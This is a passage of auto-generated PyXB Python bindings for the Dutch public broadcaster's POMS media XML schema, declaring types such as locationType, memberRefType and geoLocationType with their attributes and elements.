__state._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 796, 8)
__state._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 796, 8)
state = property(__state.value, __state.set, None, None)
# Attribute publishStart uses Python identifier publishStart
__publishStart = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publishStart'), 'publishStart', '__urnvpromedia2009_predictionType_publishStart', pyxb.binding.datatypes.dateTime)
__publishStart._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 797, 8)
__publishStart._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 797, 8)
publishStart = property(__publishStart.value, __publishStart.set, None, None)
# Attribute publishStop uses Python identifier publishStop
__publishStop = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publishStop'), 'publishStop', '__urnvpromedia2009_predictionType_publishStop', pyxb.binding.datatypes.dateTime)
__publishStop._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 798, 8)
__publishStop._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 798, 8)
publishStop = property(__publishStop.value, __publishStop.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__state.name() : __state,
__publishStart.name() : __publishStart,
__publishStop.name() : __publishStop
})
_module_typeBindings.predictionType = predictionType
Namespace.addCategoryObject('typeBinding', 'predictionType', predictionType)
# Complex type {urn:vpro:media:2009}locationType with content type ELEMENT_ONLY
class locationType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}locationType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'locationType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 809, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}programUrl uses Python identifier programUrl
__programUrl = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'programUrl'), 'programUrl', '__urnvpromedia2009_locationType_urnvpromedia2009programUrl', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 811, 6), )
programUrl = property(__programUrl.value, __programUrl.set, None, None)
# Element {urn:vpro:media:2009}avAttributes uses Python identifier avAttributes
__avAttributes = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'avAttributes'), 'avAttributes', '__urnvpromedia2009_locationType_urnvpromedia2009avAttributes', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 812, 6), )
avAttributes = property(__avAttributes.value, __avAttributes.set, None, None)
# Element {urn:vpro:media:2009}subtitles uses Python identifier subtitles
__subtitles = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'subtitles'), 'subtitles', '__urnvpromedia2009_locationType_urnvpromedia2009subtitles', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 813, 6), )
subtitles = property(__subtitles.value, __subtitles.set, None, None)
# Element {urn:vpro:media:2009}offset uses Python identifier offset
__offset = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'offset'), 'offset', '__urnvpromedia2009_locationType_urnvpromedia2009offset', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 814, 6), )
offset = property(__offset.value, __offset.set, None, None)
# Element {urn:vpro:media:2009}duration uses Python identifier duration
__duration = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__urnvpromedia2009_locationType_urnvpromedia2009duration', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 815, 6), )
duration = property(__duration.value, __duration.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_locationType_type', _module_typeBindings.locationTypeEnum)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 817, 4)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 817, 4)
type = property(__type.value, __type.set, None, None)
# Attribute platform uses Python identifier platform
__platform = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'platform'), 'platform', '__urnvpromedia2009_locationType_platform', _module_typeBindings.platformTypeEnum)
__platform._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 818, 4)
__platform._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 818, 4)
platform = property(__platform.value, __platform.set, None, None)
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_locationType_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum, required=True)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 819, 4)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 819, 4)
owner = property(__owner.value, __owner.set, None, None)
# Attribute urn uses Python identifier urn
__urn = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'urn'), 'urn', '__urnvpromedia2009_locationType_urn', pyxb.binding.datatypes.anyURI)
__urn._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 11, 4)
__urn._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 11, 4)
urn = property(__urn.value, __urn.set, None, None)
# Attribute publishStart uses Python identifier publishStart
__publishStart = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publishStart'), 'publishStart', '__urnvpromedia2009_locationType_publishStart', pyxb.binding.datatypes.dateTime)
__publishStart._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 12, 4)
__publishStart._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 12, 4)
publishStart = property(__publishStart.value, __publishStart.set, None, None)
# Attribute publishStop uses Python identifier publishStop
__publishStop = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publishStop'), 'publishStop', '__urnvpromedia2009_locationType_publishStop', pyxb.binding.datatypes.dateTime)
__publishStop._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 13, 4)
__publishStop._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 13, 4)
publishStop = property(__publishStop.value, __publishStop.set, None, None)
# Attribute publishDate uses Python identifier publishDate
__publishDate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publishDate'), 'publishDate', '__urnvpromedia2009_locationType_publishDate', pyxb.binding.datatypes.dateTime)
__publishDate._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 14, 4)
__publishDate._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 14, 4)
publishDate = property(__publishDate.value, __publishDate.set, None, None)
# Attribute creationDate uses Python identifier creationDate
__creationDate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'creationDate'), 'creationDate', '__urnvpromedia2009_locationType_creationDate', pyxb.binding.datatypes.dateTime)
__creationDate._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 15, 4)
__creationDate._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 15, 4)
creationDate = property(__creationDate.value, __creationDate.set, None, None)
# Attribute lastModified uses Python identifier lastModified
__lastModified = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'lastModified'), 'lastModified', '__urnvpromedia2009_locationType_lastModified', pyxb.binding.datatypes.dateTime)
__lastModified._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 16, 4)
__lastModified._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 16, 4)
lastModified = property(__lastModified.value, __lastModified.set, None, None)
# Attribute workflow uses Python identifier workflow
__workflow = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'workflow'), 'workflow', '__urnvpromedia2009_locationType_workflow', _ImportedBinding_npoapi_xml_shared.workflowEnumType)
__workflow._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 17, 4)
__workflow._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 17, 4)
workflow = property(__workflow.value, __workflow.set, None, None)
_ElementMap.update({
__programUrl.name() : __programUrl,
__avAttributes.name() : __avAttributes,
__subtitles.name() : __subtitles,
__offset.name() : __offset,
__duration.name() : __duration
})
_AttributeMap.update({
__type.name() : __type,
__platform.name() : __platform,
__owner.name() : __owner,
__urn.name() : __urn,
__publishStart.name() : __publishStart,
__publishStop.name() : __publishStop,
__publishDate.name() : __publishDate,
__creationDate.name() : __creationDate,
__lastModified.name() : __lastModified,
__workflow.name() : __workflow
})
_module_typeBindings.locationType = locationType
Namespace.addCategoryObject('typeBinding', 'locationType', locationType)
# Complex type {urn:vpro:media:2009}descendantRefType with content type EMPTY
class descendantRefType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}descendantRefType with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'descendantRefType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 850, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute midRef uses Python identifier midRef
__midRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'midRef'), 'midRef', '__urnvpromedia2009_descendantRefType_midRef', _module_typeBindings.midType)
__midRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 851, 4)
__midRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 851, 4)
midRef = property(__midRef.value, __midRef.set, None, None)
# Attribute urnRef uses Python identifier urnRef
__urnRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'urnRef'), 'urnRef', '__urnvpromedia2009_descendantRefType_urnRef', pyxb.binding.datatypes.anyURI)
__urnRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 852, 4)
__urnRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 852, 4)
urnRef = property(__urnRef.value, __urnRef.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_descendantRefType_type', _module_typeBindings.mediaTypeEnum, required=True)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 853, 4)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 853, 4)
type = property(__type.value, __type.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__midRef.name() : __midRef,
__urnRef.name() : __urnRef,
__type.name() : __type
})
_module_typeBindings.descendantRefType = descendantRefType
Namespace.addCategoryObject('typeBinding', 'descendantRefType', descendantRefType)
# Complex type {urn:vpro:media:2009}memberRefType with content type ELEMENT_ONLY
class memberRefType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}memberRefType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'memberRefType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 859, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}episodeOf uses Python identifier episodeOf
__episodeOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'episodeOf'), 'episodeOf', '__urnvpromedia2009_memberRefType_urnvpromedia2009episodeOf', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 861, 6), )
episodeOf = property(__episodeOf.value, __episodeOf.set, None, None)
# Element {urn:vpro:media:2009}memberOf uses Python identifier memberOf
__memberOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'memberOf'), 'memberOf', '__urnvpromedia2009_memberRefType_urnvpromedia2009memberOf', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 862, 6), )
memberOf = property(__memberOf.value, __memberOf.set, None, None)
# Element {urn:vpro:media:2009}segmentOf uses Python identifier segmentOf
__segmentOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'segmentOf'), 'segmentOf', '__urnvpromedia2009_memberRefType_urnvpromedia2009segmentOf', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 863, 6), )
segmentOf = property(__segmentOf.value, __segmentOf.set, None, None)
# Attribute midRef uses Python identifier midRef
__midRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'midRef'), 'midRef', '__urnvpromedia2009_memberRefType_midRef', _module_typeBindings.midType)
__midRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 865, 4)
__midRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 865, 4)
midRef = property(__midRef.value, __midRef.set, None, '\n Reference to the MID of the parent of this object.\n ')
# Attribute urnRef uses Python identifier urnRef
__urnRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'urnRef'), 'urnRef', '__urnvpromedia2009_memberRefType_urnRef', pyxb.binding.datatypes.anyURI)
__urnRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 872, 4)
__urnRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 872, 4)
urnRef = property(__urnRef.value, __urnRef.set, None, "\n Reference to the URN of the parent of this object. URN's are no longer actively used, but the attribute is\n still available for backwards compatibility.\n ")
# Attribute cridRef uses Python identifier cridRef
__cridRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'cridRef'), 'cridRef', '__urnvpromedia2009_memberRefType_cridRef', pyxb.binding.datatypes.anyURI)
__cridRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 880, 4)
__cridRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 880, 4)
cridRef = property(__cridRef.value, __cridRef.set, None, '\n Reference to a crid of the parent of this object. This is only used for imports from systems that cannot\n supply a MID or URN. POMS does not export or publish parent crids.\n ')
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_memberRefType_type', _module_typeBindings.mediaTypeEnum)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 888, 4)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 888, 4)
type = property(__type.value, __type.set, None, None)
# Attribute index uses Python identifier index
__index = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'index'), 'index', '__urnvpromedia2009_memberRefType_index', pyxb.binding.datatypes.positiveInteger)
__index._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 889, 4)
__index._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 889, 4)
index = property(__index.value, __index.set, None, None)
# Attribute highlighted uses Python identifier highlighted
__highlighted = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'highlighted'), 'highlighted', '__urnvpromedia2009_memberRefType_highlighted', pyxb.binding.datatypes.boolean, unicode_default='false')
__highlighted._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 890, 4)
__highlighted._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 890, 4)
highlighted = property(__highlighted.value, __highlighted.set, None, None)
# Attribute added uses Python identifier added
__added = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'added'), 'added', '__urnvpromedia2009_memberRefType_added', pyxb.binding.datatypes.dateTime)
__added._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 891, 4)
__added._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 891, 4)
added = property(__added.value, __added.set, None, None)
_ElementMap.update({
__episodeOf.name() : __episodeOf,
__memberOf.name() : __memberOf,
__segmentOf.name() : __segmentOf
})
_AttributeMap.update({
__midRef.name() : __midRef,
__urnRef.name() : __urnRef,
__cridRef.name() : __cridRef,
__type.name() : __type,
__index.name() : __index,
__highlighted.name() : __highlighted,
__added.name() : __added
})
_module_typeBindings.memberRefType = memberRefType
Namespace.addCategoryObject('typeBinding', 'memberRefType', memberRefType)
# Complex type {urn:vpro:media:2009}recursiveMemberRef with content type ELEMENT_ONLY
class recursiveMemberRef (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}recursiveMemberRef with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'recursiveMemberRef')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 897, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}memberOf uses Python identifier memberOf
__memberOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'memberOf'), 'memberOf', '__urnvpromedia2009_recursiveMemberRef_urnvpromedia2009memberOf', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 899, 6), )
memberOf = property(__memberOf.value, __memberOf.set, None, None)
# Element {urn:vpro:media:2009}episodeOf uses Python identifier episodeOf
__episodeOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'episodeOf'), 'episodeOf', '__urnvpromedia2009_recursiveMemberRef_urnvpromedia2009episodeOf', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 900, 6), )
episodeOf = property(__episodeOf.value, __episodeOf.set, None, None)
# Element {urn:vpro:media:2009}segmentOf uses Python identifier segmentOf
__segmentOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'segmentOf'), 'segmentOf', '__urnvpromedia2009_recursiveMemberRef_urnvpromedia2009segmentOf', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 901, 6), )
segmentOf = property(__segmentOf.value, __segmentOf.set, None, None)
# Attribute midRef uses Python identifier midRef
__midRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'midRef'), 'midRef', '__urnvpromedia2009_recursiveMemberRef_midRef', pyxb.binding.datatypes.string)
__midRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 903, 4)
__midRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 903, 4)
midRef = property(__midRef.value, __midRef.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_recursiveMemberRef_type', _module_typeBindings.mediaTypeEnum)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 904, 4)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 904, 4)
type = property(__type.value, __type.set, None, None)
# Attribute index uses Python identifier index
__index = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'index'), 'index', '__urnvpromedia2009_recursiveMemberRef_index', pyxb.binding.datatypes.int)
__index._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 905, 4)
__index._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 905, 4)
index = property(__index.value, __index.set, None, None)
# Attribute highlighted uses Python identifier highlighted
__highlighted = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'highlighted'), 'highlighted', '__urnvpromedia2009_recursiveMemberRef_highlighted', pyxb.binding.datatypes.boolean, unicode_default='false')
__highlighted._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 906, 4)
__highlighted._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 906, 4)
highlighted = property(__highlighted.value, __highlighted.set, None, None)
_ElementMap.update({
__memberOf.name() : __memberOf,
__episodeOf.name() : __episodeOf,
__segmentOf.name() : __segmentOf
})
_AttributeMap.update({
__midRef.name() : __midRef,
__type.name() : __type,
__index.name() : __index,
__highlighted.name() : __highlighted
})
_module_typeBindings.recursiveMemberRef = recursiveMemberRef
Namespace.addCategoryObject('typeBinding', 'recursiveMemberRef', recursiveMemberRef)
# Complex type {urn:vpro:media:2009}genreType with content type ELEMENT_ONLY
class genreType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}genreType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'genreType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 949, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}term uses Python identifier term
__term = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'term'), 'term', '__urnvpromedia2009_genreType_urnvpromedia2009term', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 951, 6), )
term = property(__term.value, __term.set, None, None)
# Attribute id uses Python identifier id
__id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'id'), 'id', '__urnvpromedia2009_genreType_id', _module_typeBindings.genreIdType, required=True)
__id._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 953, 4)
__id._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 953, 4)
id = property(__id.value, __id.set, None, None)
_ElementMap.update({
__term.name() : __term
})
_AttributeMap.update({
__id.name() : __id
})
_module_typeBindings.genreType = genreType
Namespace.addCategoryObject('typeBinding', 'genreType', genreType)
# Complex type {urn:vpro:media:2009}geoLocationsType with content type ELEMENT_ONLY
class geoLocationsType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}geoLocationsType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'geoLocationsType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 972, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}geoLocation uses Python identifier geoLocation
__geoLocation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'geoLocation'), 'geoLocation', '__urnvpromedia2009_geoLocationsType_urnvpromedia2009geoLocation', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 974, 6), )
geoLocation = property(__geoLocation.value, __geoLocation.set, None, None)
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_geoLocationsType_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 976, 4)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 976, 4)
owner = property(__owner.value, __owner.set, None, None)
_ElementMap.update({
__geoLocation.name() : __geoLocation
})
_AttributeMap.update({
__owner.name() : __owner
})
_module_typeBindings.geoLocationsType = geoLocationsType
Namespace.addCategoryObject('typeBinding', 'geoLocationsType', geoLocationsType)
# Complex type {urn:vpro:media:2009}geoLocationType with content type ELEMENT_ONLY
class geoLocationType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}geoLocationType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'geoLocationType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 979, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}name uses Python identifier name
__name = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'name'), 'name', '__urnvpromedia2009_geoLocationType_urnvpromedia2009name', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 981, 6), )
name = property(__name.value, __name.set, None, None)
# Element {urn:vpro:media:2009}scopeNote uses Python identifier scopeNote
__scopeNote = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'scopeNote'), 'scopeNote', '__urnvpromedia2009_geoLocationType_urnvpromedia2009scopeNote', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 982, 6), )
scopeNote = property(__scopeNote.value, __scopeNote.set, None, None)
# Attribute role uses Python identifier role
__role = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'role'), 'role', '__urnvpromedia2009_geoLocationType_role', _module_typeBindings.geoRoleType, required=True)
__role._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 984, 4)
__role._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 984, 4)
role = property(__role.value, __role.set, None, None)
# Attribute gtaaUri uses Python identifier gtaaUri
__gtaaUri = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'gtaaUri'), 'gtaaUri', '__urnvpromedia2009_geoLocationType_gtaaUri', pyxb.binding.datatypes.string)
__gtaaUri._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 985, 4)
__gtaaUri._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 985, 4)
gtaaUri = property(__gtaaUri.value, __gtaaUri.set, None, None)
# Attribute gtaaStatus uses Python identifier gtaaStatus
__gtaaStatus = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'gtaaStatus'), 'gtaaStatus', '__urnvpromedia2009_geoLocationType_gtaaStatus', _module_typeBindings.gtaaStatusType)
__gtaaStatus._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 986, 4)
__gtaaStatus._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 986, 4)
gtaaStatus = property(__gtaaStatus.value, __gtaaStatus.set, None, None)
_ElementMap.update({
__name.name() : __name,
__scopeNote.name() : __scopeNote
})
_AttributeMap.update({
__role.name() : __role,
__gtaaUri.name() : __gtaaUri,
__gtaaStatus.name() : __gtaaStatus
})
_module_typeBindings.geoLocationType = geoLocationType
Namespace.addCategoryObject('typeBinding', 'geoLocationType', geoLocationType)
# Complex type {urn:vpro:media:2009}topicsType with content type ELEMENT_ONLY
class topicsType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}topicsType with content type ELEMENT_ONLY"""
